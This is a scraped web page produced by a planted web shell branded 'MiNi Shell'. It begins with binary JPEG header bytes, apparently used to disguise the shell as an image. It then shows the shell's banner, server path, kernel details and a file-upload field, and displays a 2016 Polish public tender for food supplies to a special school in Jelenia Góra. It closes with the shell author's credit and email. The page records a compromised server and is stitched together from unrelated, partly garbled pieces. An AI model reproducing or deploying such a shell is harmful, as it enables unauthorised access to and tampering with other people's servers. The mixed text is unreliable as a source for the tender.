JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160304/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160304/23053-N-2016.html

<p class="kh_header"><b>Jelenia Góra: Dostawa artykułów spożywczych w pakietach do Specjalnego Ośrodka Szkolno - Wychowawczego w Jeleniej Górze</b><br>
<b>Numer ogłoszenia: 23053 - 2016; data zamieszczenia: 04.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół i Placówek Specjalnych , ul. Kruszwicka 3, 58-500 Jelenia Góra, woj. dolnośląskie, tel. 0-75 7678963, 7538723, faks 0-75 7538726.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip294.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka oświatowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych w pakietach do Specjalnego Ośrodka Szkolno - Wychowawczego w Jeleniej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy artykułów spożywczych w częściach. 
 
Część 1-mleko, nabiał, art. spożywcze CPV 15000000-8, 15500000-3, 
Nazwa asortymentu	Jednostka miary	Ilość
fasola średni Jaś	kg	25
groch łuszczony połówki 400 g	szt	30
herbata expresowa Saga 300 torebek w paczce	szt	10
jaja kl L ściółkowe	szt	8680
jogurt naturalny 150 g	szt	1435
jogurt naturalny 180 g	szt	1385
jogurt naturalny grecki 330 g	szt	140
jogurt naturalny z miodem 150 g	szt	952
jogurt naturalny z miodem 180 g	szt	200
kakao Decomoreno 150g	szt	30
kakao Puchatek 300 g	szt	62
kasza gryczana	kg	15
kasza gryczana 400 g	szt	260
kasza jęczmienna	kg	240
kasza jęczmienna pęczak 500 g	szt	235
kasza manna	kg	18
kawa inka 150 g paczka	szt	66
ketchup łagodny Pudliszki 480 g	szt	230
koncentrat pomidorowy Pudliszki 950 g	szt	86
Łowicz 100% owoców extra gładki 235 g	szt	80
makaron Goliard 250 g nitki	szt	246
makaron łazanki Lubella	kg	44
makaron muszelki mini 500 g	szt	120
makaron spaghetti Lubella	kg	150
makaron spaghetti Lubella 500 g	szt	30
makaron świderki Lubella	kg	106
makaron w formie ryżu 500 g	szt	36
masło mixełko łaciate 200g	szt	280
masło Osełka Sobik 300g	szt	500
masło wiejskie Koło 82 % 200 g	szt	1392
mąka wrocławska Bolesławiec typ 500	kg	280
mąka z pełnego przemiału pszenna	kg	10
miód wielokwiatowy 1100 g	szt	570
miód wielokwiatowy 25 g	szt	264
mleko 2% 1 l karton	szt	1900
mleko folia 2% 0,9 l	szt	400
ogórek konserwowy Frubex 880 g słoik	szt	205
olej Kujawski 1 l	szt	559
pasta sandwiczowa 160 g	szt	240
pasztet prochowicki 160 g	szt	120
pieprz 30 g	szt	150
płatki jęczmienne 400 g	szt	26
płatki kukurydziane Nestle	kg	22
płatki owsiane górskie 500 g	szt	46
pomidory bez skóry karton 400 g	szt	80
ryż	kg	171
ryż paraboiled 4 x 100 g	szt	210
ser wędzony zamojski	kg	22
ser żółty gouda	kg	19
ser żółty gouda plastry	kg	30
ser żółty Salami Serenada dojrzewający tłusty	kg	73
serek Almette 150 g	szt	136
serek wiejski 200 g Koło	szt	84
soczewica czerwona 350 g	szt	71
soczewica czerwona 4x80 g	szt	58
sok jabłkowy 100% karton 0,2l	szt	200
sok owocowy b/c 200 g	szt	4314
sól niskosodowa z potasem	kg	180
szczaw konserwowy Rolnik 300 g	szt	186
śmietana Łaciata 18% 0,5 l	szt	850
śmietana łaciata 30% 0,5l	szt	400
twaróg półtłusty krajanka	kg	76
twaróg półtłusty w pergaminie	kg	100
wafle kukurydziane 18 g	szt	340
wafle kukurydziane 36 g	szt	336
wafle podpłomyki b/c 145 g	szt	620
woda niegazowana 1,5 l	szt	300
żur śląski 450 ml 	szt	148

Część 2-mięso, drób, art. wędliniarskie CPV 15100000-9; 
Nazwa asortymentu	Jednostka miary	Ilość
boczek surowy	kg	40
boczek wędzony	kg	44
kiełbasa biała surowa	kg	101
kiełbasa krakowska podsuszana z Polskiego Dwora	kg	20
kiełbasa parówki zawartość mięsa minimum 90%	kg	62
kiełbasa schabówka	kg	73
kiełbasa sucha Geesowska	kg	35
kiełbasa śląska	kg	75
kiełbasa wiejska pieczona	kg	40
kiełbasa winerki	kg	30
kiełbaski pyszne	kg	10,7
kości wędzone	kg	153
mięso wołowina pieczeniowa b/kości	kg	75
mięso filet z indyka	kg	216
mięso filet z kurczaka	kg	457
mięso karczek b/kości	kg	568
mięso łopatka b/kości	kg	360
mięso polędwiczki wieprzowe	kg	70
mięso schab b/kości	kg	335
mięso schab z kością	kg	40
mięso szynka b/kości	kg	170
mięso udka z kurczaka	kg	487
porcje rosołowe ze skrzydłami	kg	957

Część 3 -warzywa, owoce CPV 15300000-1; , 
Nazwa asortymentu	Jednostka miary	Ilość
banany	kg	1075
borówka amerykańska 0,25 kg	szt	60
buraki	kg	331
cebula	kg	460
cytryny	kg	43
czosnek polski	szt	50
gruszka	kg	372
imbir świeży	kg	2
jabłka	kg	1700
kapusta biała	kg	260
kapusta czerwona	kg	97
kapusta kiszona	kg	100
kapusta kiszona wiadro 5 kg	kg	340
kapusta pekińska	kg	187
malina 0,5 kg	szt	50
mandarynki	kg	403
marchew korzeń	kg	187
ogórek zielony	kg	387
ogórki kiszone 3 kg	szt	25
ogórki kiszone 500 g	szt	200
papryka czerwona	kg	98
pieczarki	kg	147
pietruszka korzeń	kg	60
pomarańcze	kg	280
pomidor	kg	359
por	kg	30
seler 	kg	95
ziemniaki	kg	6635


 Część 4-ryby mrożone, warzywa mrożone CPV 152200006; 15331170-9; 
Nazwa asortymentu	Jednostka miary	Ilość
brokuł	kg	60
bukiet warzyw królewski	kg	130
fasolka szparagowa	kg	110
groszek	kg	62
kalafior 	kg	60
makrela wędzona	kg	60
marchew kostka	kg	147
marchew mini	kg	82
mieszanka chińska	kg	180
mieszanka kompotowa bez pestki	kg	170
paluszki rybne z Mintaja	kg	88
porzeczka czarna	kg	20
porzeczka czerwona	kg	20
ryba filet Dorsz bez glazury	kg	425
ryba filet Miruna bez glazury	kg	527
szpinak rozdrobniony	kg	25
truskawka mrożona	kg	150
wiśnia	kg	20
wiśnia drylowana	kg	20
włoszczyzna paski	kg	415
zupa jarzynowa	kg	70
zupa wiosenna ze szparagami 	kg	30


Część 5-chleb, artykuły piekarnicze CPV 15810000-9; 
Nazwa asortymentu	Jednostka miary	Ilość
bułka grahamka 80 g	szt	870
bułka maślana 80 g	szt	400
bułka razowa 30 g	szt	400
bułka razowa 80 g	szt	720
bułka tarta 450g	szt	40
bułka tarta 500g	szt	84
bułka z dynią 30 g	szt	2530
bułka zwykła duża 80 g	szt	300
bułka zwykła mała 30 g	szt	4120
bułka zwykła mała 50 g	szt	200
chleb graham 400 g	szt	100
chleb pełnoziarnisty 400 g	szt	300
chleb razowy 400 g	szt	266
chleb razowy 500 g	szt	200
chleb wieloziarnisty 400 g	szt	100
chleb ze słonecznikiem 400 g	szt	200
chleb ze wiejski 600 g	szt	397
chleb ze wsi 500 g	szt	80
chleb zwykły krojony 600 g	szt	505
ciasto babka piaskowa 400g	szt	36
rogal maślany 100 g	szt	440

Część 6 - pierogi, uszka, kluski i inne wyroby mączne CPV 15851000-8 
Nazwa asortymentu	Jednostka miary	Ilość
kluski leniwe świeże	kg	220
kluski śląskie świeże	kg	174
kopytka świeże	kg	165
krokiety z kapustą i pieczarkami świeże	kg	101
krokiety z serem i pieczarkami świeże	kg	60
naleśniki z jabłkiem świeże	kg	24
naleśniki z serem świeże	kg	83
pierogi ruskie świeże	kg	246
pierogi z jagodami świeże 	kg	20
pierogi z kapustą i grzybami świeże	kg	92
pierogi z mięsem świeże	kg	185
pierogi z serem świeże	kg	75
pierogi z truskawkami świeże	kg	20

Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia zamawianych dostaw o 20% w związku z nowym rokiem szkolnym i możliwą zmianą ilości uczniów, której Zamawiający nie jest w stanie obecnie dokładnie określić. Wykonawca dostarczy i rozładuje przedmiot zamówienia na wskazane przez zamawiającego miejsce na terenie Specjalnego Ośrodka Szkolno-Wychowawczego przy ul. Kruszwickiej 3 i przy ul. Grottgera 1. Dostawy przedmiotu zamówienia odbywać się będą sukcesywnie raz - dwa razy w tygodniu po telefonicznym zamówieniu złożonym przez osoby upoważnione przez Zamawiającego w przeddzień dostawy w dni robocze w godzinach 7.00-15.00 transportem wykonawcy, przeznaczonym do przewozu artykułów spożywczych , zgodnie z przepisami wydanymi na podstawie ustawy z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia ( Dz. U. z 2006 r. Nr 171 poz. 1225 z późniejszymi zmianami). Artykuły spożywcze muszą być świeże, o najwyższej jakości Artykuły spożywcze muszą spełniać wymagania wszystkich odpowiednich norm oraz posiadać wszelkie niezbędne dokumenty i atesty dopuszczające do obrotu na terenie kraju. Zamówienia będą realizowane przez okres 12 miesięcy od dnia podpisania umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Artykuły spożywcze w pakietach. Część 1-mleko, nabiał, art. spożywcze CPV 15000000-8, 15500000-3, Część 2-mięso, drób, art. wędliniarskie CPV 15100000-9, Część 3 -warzywa, owoce CPV 15300000-1, Część 4-ryby, warzywa mrożone 152200006; 15331177-9, Część 5-chleb,artykuły piekarnicze CPV 15810000-9,  Część 6 - pierogi, uszka, kluski i inne wyroby mączne CPV 15851000-8. 

Zamawiający przewiduje zamówienia uzupełniające w kwocie nie przekraczającej 20% wartości zamówienia podstawowego, którego zakres będzie zgodny z przedmiotem zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.51.00.00-3, 15.10.00.00-9, 15.30.00.00-1, 15.22.00.00-6, 15.33.11.77-9, 15.81.00.00-9, 15.85.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzające, że profil działania wykonawcy odpowiada przedmiotowi zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przystępujący do postępowania musi udowodnić wykonywanie w okresie ostatnich trzech lat co najmniej dwóch dostaw o charakterze podobnym do przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie środka transportu, przeznaczonego do przewozu artykułów spożywczych , zgodnie z przepisami wydanymi na podstawie ustawy z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel niezbędny do realizacji przedmiotu zamówienia, tj. zatrudniać co najmniej jednego kierowcę, magazyniera, fakturzystkę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi mieć dostęp lub dysponować środkami finansowymi wystarczającymi do realizacji przedmiotu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, że dostawy będą spełniać wszystkie odpowiednie normy oraz posiadają niezbędne dokumenty i atesty dopuszczające do obrotu na terenie kraju.
Zobowiązanie, że wszystkie dostarczane produkty będą świeże, najwyższej jakości.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip294.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalny Ośrodek Szkolno-Wychowawczy, 58-500 Jelenia Góra, ul. Kruszwicka 3, tel. 757538723 sekretariat lub pobrać ze strony bip294.lo.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2016 godzina 14:00, miejsce: Specjalny Ośrodek Szkolno-Wychowawczy, 58-500 Jelenia Góra, ul. Kruszwicka 3, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com